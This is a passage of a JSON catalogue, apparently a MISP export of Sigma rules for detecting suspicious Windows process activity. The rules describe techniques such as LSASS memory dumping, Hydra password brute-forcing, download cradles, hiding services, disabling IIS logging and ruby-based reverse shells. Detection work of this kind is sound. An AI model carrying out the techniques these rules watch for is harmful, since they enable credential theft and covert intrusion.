"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml" ], "tags": [ "attack.execution", "attack.t1204.002", "attack.g0046", "car.2013-05-002" ] }, "related": [ { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", "value": "Suspicious Binary In User Directory Spawned From Office Application" }, { "description": "Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_nslookup_poweshell_download.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/Alh4zr3d/status/1566489367232651264", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "1b3b01c7-84e9-4072-86e5-fc285a41ff23", "value": "Nslookup PowerShell Download Cradle - ProcessCreation" }, { "description": "Detects execution of \"git\" in order to clone a remote repository that contain suspicious keywords which might be suspicious", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-03", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_git_susp_clone.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_git_susp_clone.yml" ], "tags": [ "attack.reconnaissance", "attack.t1593.003" ] }, "related": [ { "dest-uuid": "70910fbd-58dc-4c1c-8c48-814d11fcd022", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "aef9d1f1-7396-4e92-a927-4567c7a495c1", "value": "Suspicious Git Clone" }, { "description": "Detects usage of the \"sc.exe\" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.", "meta": { "author": "Andreas Hunkeler (@Karneades)", "creation_date": "2021-12-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sc_sdset_hide_sevices.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", "https://twitter.com/Alh4zr3d/status/1580925761996828672", "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_sdset_hide_sevices.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.011" ] }, "related": [ { "dest-uuid": "17cc750b-e95b-4d7d-9dde-49e0de24148c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a537cfc3-4297-4789-92b5-345bfd845ad0", "value": "Service DACL Abuse To Hide Services Via Sc.EXE" }, { "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-22", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_registry_typed_paths_persistence.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://forensafe.com/blogs/typedpaths.html", "https://twitter.com/dez_/status/1560101453150257154", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_typed_paths_persistence.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "ec88289a-7e1a-4cc3-8d18-bd1f60e4b9ba", "value": "Persistence Via TypedPaths - CommandLine" }, { "description": "Detects the usage of the \"Squirrel.exe\" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community", "creation_date": "2022-06-09", "falsepositive": [ "Expected FP with some Electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop, etc.)" ], "filename": "proc_creation_win_squirrel_proxy_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/", "http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/", "http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_squirrel_proxy_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "45239e6a-b035-4aaf-b339-8ad379fcb67e", "value": "Process Proxy Execution Via Squirrel.EXE" }, { "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://isc.sans.edu/diary/22264", "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1197", "attack.s0190", "attack.t1036.003" ] }, "related": [ { "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2ddef153-167b-4e89-86b6-757a9e65dcac", "value": "File Download Via Bitsadmin To A Suspicious Target Folder" }, { "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. Often used by attacker to remove AV software services", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-01", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_reg_delete_services.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_delete_services.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", "value": "Service Registry Key Deleted Via Reg.EXE" }, { "description": "Detects a suspicious child process of userinit", "meta": { "author": "Florian Roth (Nextron Systems), Samir Bousseaden (idea)", "creation_date": "2019-06-17", "falsepositive": [ "Administrative scripts" ], "filename": "proc_creation_win_susp_userinit_child.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/SBousseaden/status/1139811587760562176", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml" ], "tags": [ "attack.defense-evasion", "attack.t1055" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b655a06a-31c0-477a-95c2-3726b83d649d", "value": "Suspicious Userinit Child Process" }, { "description": "Detects attackers using tooling with bad opsec defaults.\nE.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.\nOne trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.\n", "meta": { "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", "creation_date": "2020-10-23", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_susp_bad_opsec_sacrificial_processes.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool", "https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/", "https://learn.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32", "https://twitter.com/CyberRaiju/status/1251492025678983169", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32", "https://www.cobaltstrike.com/help-opsec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bad_opsec_sacrificial_processes.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.011" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a7c3d773-caef-227e-a7e7-c2f13c622329", "value": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments" }, { "description": "Detects the execution GMER tool based on image and hash fields.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-05", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_gmer.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "http://www.gmer.net/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_gmer.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "9082ff1f-88ab-4678-a3cc-5bcff99fc74d", "value": "HackTool - GMER Rootkit Detector and Remover Execution" }, { "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-02-11", "falsepositive": [ "Legitimate tools that accidentally match on the searched patterns" ], "filename": "proc_creation_win_susp_progname.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_progname.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", "value": "Suspicious Program Names" }, { "description": "ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context.", "meta": { "author": "frack113", "creation_date": "2022-12-09", "falsepositive": [ "Very Likely, including launching cmd.exe via Run As Administrator" ], "filename": "proc_creation_win_conhost_legacy_option.yml", "level": "informational", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/secauthz/mandatory-integrity-control", "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", "https://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conhost_legacy_option.yml" ], "tags": [ "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3037d961-21e9-4732-b27a-637bcc7bf539", "value": "Suspicious High IntegrityLevel Conhost Legacy Option" }, { "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", "meta": { "author": "frack113", "creation_date": "2022-01-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_iis_appcmd_http_logging.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.002/T1562.002.md#atomic-test-1---disable-windows-iis-http-logging", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_appcmd_http_logging.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.002" ] }, "related": [ { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", "value": "Disable Windows IIS HTTP Logging" }, { "description": "Detects uncommon or suspicious child processes of \"eventvwr.exe\" which might indicate a UAC bypass attempt", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-03-19", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_eventvwr_susp_child_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100", "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_eventvwr_susp_child_process.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002", "car.2019-04-001" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "be344333-921d-4c4d-8bb8-e584cf584780", "value": "Potentially Suspicious Event Viewer Child Process" }, { "description": "Detect indirect command execution via Program Compatibility Assistant pcwrun.exe", "meta": { "author": "A. Sungurov , oscd.community", "creation_date": "2020-10-12", "falsepositive": [ "Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts", "Legit usage of scripts" ], "filename": "proc_creation_win_lolbin_pcwrun.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/pabraeken/status/991335019833708544", "https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218", "attack.execution" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b97cd4b1-30b8-4a9d-bd72-6293928d52bc", "value": "Indirect Command Execution By Program Compatibility Wizard" }, { "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", "meta": { "author": "Jonathan Cheong, oscd.community", "creation_date": "2020-10-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_invoke_obfuscation_clip.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_clip.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b222df08-0e07-11eb-adc1-0242ac120002", "value": "Invoke-Obfuscation CLIP+ Launcher" }, { "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) execution location.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-10-14", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wermgr_susp_exec_location.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html", "https://github.com/binderlabs/DirCreate2System", "https://www.echotrail.io/insights/search/wermgr.exe", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wermgr_susp_exec_location.yml" ], "tags": [ "attack.execution" ] }, "uuid": "5394fcc7-aeb2-43b5-9a09-cac9fc5edcd5", "value": "Suspicious Execution Location Of Wermgr.EXE" }, { "description": "Detects potentially suspicious file download from file sharing domains using curl.exe", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_curl_download_susp_file_sharing_domains.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv", "https://labs.withsecure.com/publications/fin7-target-veeam-servers", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml" ], "tags": [ "attack.execution" ] }, "uuid": "56454143-524f-49fb-b1c6-3fb8b1ad41fb", "value": "Suspicious File Download From File Sharing Domain Via Curl.EXE" }, { "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2020-02-04", "falsepositive": [ "Very unlikely" ], "filename": "proc_creation_win_hktl_dumpert.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/", "https://github.com/outflanknl/Dumpert", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_dumpert.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2704ab9e-afe2-4854-a3b1-0c0706d03578", "value": "HackTool - Dumpert Process Dumper Execution" }, { "description": "Detects command line parameters used by Hydra password guessing hack tool", "meta": { "author": "Vasiliy Burov", "creation_date": "2020-10-05", "falsepositive": [ "Software that uses the caret encased keywords PASS and USER in its command line" ], "filename": "proc_creation_win_hktl_hydra.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/vanhauser-thc/thc-hydra", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_hydra.yml" ], "tags": [ "attack.credential-access", "attack.t1110", "attack.t1110.001" ] }, "related": [ { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "aaafa146-074c-11eb-adc1-0242ac120002", "value": "HackTool - Hydra Password Bruteforce Execution" }, { "description": "Detects wscript/cscript executions of scripts located in user directories", "meta": { "author": "Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2019-01-16", "falsepositive": [ "Some installers might generate a similar behavior. An initial baseline is required" ], "filename": "proc_creation_win_wscript_cscript_dropper.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/gootloader/", "https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wscript_cscript_dropper.yml" ], "tags": [ "attack.execution", "attack.t1059.005", "attack.t1059.007" ] }, "related": [ { "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cea72823-df4d-4567-950c-0b579eaf0846", "value": "Potential Dropper Script Execution Via WScript/CScript" }, { "description": "Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.", "meta": { "author": "frack113", "creation_date": "2021-07-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_infdefaultinstall_execute_sct_scripts.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md#atomic-test-4---infdefaultinstallexe-inf-execution", "https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_infdefaultinstall_execute_sct_scripts.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ce7cf472-6fcc-490a-9481-3786840b5d9b", "value": "InfDefaultInstall.exe .inf Execution" }, { "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_imagingdevices_unusual_parents.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_imagingdevices_unusual_parents.yml" ], "tags": [ "attack.defense-evasion", "attack.execution" ] }, "uuid": "f11f2808-adb4-46c0-802a-8660db50fa99", "value": "ImagingDevices Unusual Parent/Child Processes" }, { "description": "Detects the execution of netsh with the \"trace\" flag in order to start a network capture", "meta": { "author": "Kutepov Anton, oscd.community", "creation_date": "2019-10-24", "falsepositive": [ "Legitimate administration activity" ], "filename": "proc_creation_win_netsh_packet_capture.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blogs.msdn.microsoft.com/canberrapfe/2012/03/30/capture-a-network-trace-without-installing-anything-capture-a-network-trace-of-a-reboot/", "https://klausjochem.me/2016/02/03/netsh-the-cyber-attackers-tool-of-choice/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_packet_capture.yml" ], "tags": [ "attack.discovery", "attack.credential-access", "attack.t1040" ] }, "related": [ { "dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d3c3861d-c504-4c77-ba55-224ba82d0118", "value": "New Network Trace Capture Started Via Netsh.EXE" }, { "description": "Detects execution of ruby using the \"-e\" flag. This is could be used as a way to launch a reverse shell or execute live ruby code.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_ruby_inline_command_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.revshells.com/", "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ruby_inline_command_execution.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8", "value": "Ruby Inline Command Execution" }, { "description": "Detects suspicious process related to rasdial.exe", "meta": { "author": "juju4", "creation_date": "2019-01-16", "falsepositive": [ "False positives depend on scripts and administrative tools used in the monitored environment" ], "filename": "proc_creation_win_rasdial_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/subTee/status/891298217907830785", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rasdial_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6bba49bf-7f8c-47d6-a1bb-6b4dece4640e", "value": "Suspicious RASdial Activity" }, { "description": "Detects whether the image specified in a process creation event doesn't refer to an \".exe\" (or other known executable extension) file. This can be caused by process ghosting or other unorthodox methods to start a process.\nThis rule might require some initial baselining to align with some third party tooling in the user environment.\n", "meta": { "author": "Max Altgelt (Nextron Systems)", "creation_date": "2021-12-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_non_exe_image.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://pentestlaboratories.com/2021/12/08/process-ghosting/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "c09dad97-1c78-4f71-b127-7edb2b8e491a", "value": "Execution of Suspicious File Type Extension" }, { "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Christopher Peacock @securepeacock", "creation_date": "2023-04-18", "falsepositive": [ "Likely with legitimate usage of \".rdp\" files" ], "filename": "proc_creation_win_mstsc_run_local_rdp_file.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20230726144748/https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/", "https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc_run_local_rdp_file.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5fdce3ac-e7f9-4ecd-a3aa-a4d78ebbf0af", "value": "Mstsc.EXE Execution With Local RDP File" }, { "description": "Detects command line containing reference to the \"::$index_allocation\" stream, which can be used as a technique to prevent access to folders or files from tooling such as \"explorer.exe\" or \"powershell.exe\"\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Scoubi (@ScoubiMtl)", "creation_date": "2023-10-09", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_susp_hidden_dir_index_allocation.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://sec-consult.com/blog/detail/pentesters-windows-ntfs-tricks-collection/", "https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/", "https://twitter.com/pfiatde/status/1681977680688738305", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/c54dec26-1551-4d3a-a0ea-4fa40f848eb3", "https://github.com/redcanaryco/atomic-red-team/blob/5c3b23002d2bbede3c07e7307165fc2a235a427d/atomics/T1564.004/T1564.004.md#atomic-test-5---create-hidden-directory-via-index_allocation", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_hidden_dir_index_allocation.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.004" ] }, "related": [ { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0900463c-b33b-49a8-be1d-552a3b553dae", "value": "Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI" }, { "description": "Detects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications.", "meta": { "author": "frack113", "creation_date": "2021-07-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_clip_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/clip", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1115/T1115.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_clip_execution.yml" ], "tags": [ "attack.collection", "attack.t1115" ] }, "related": 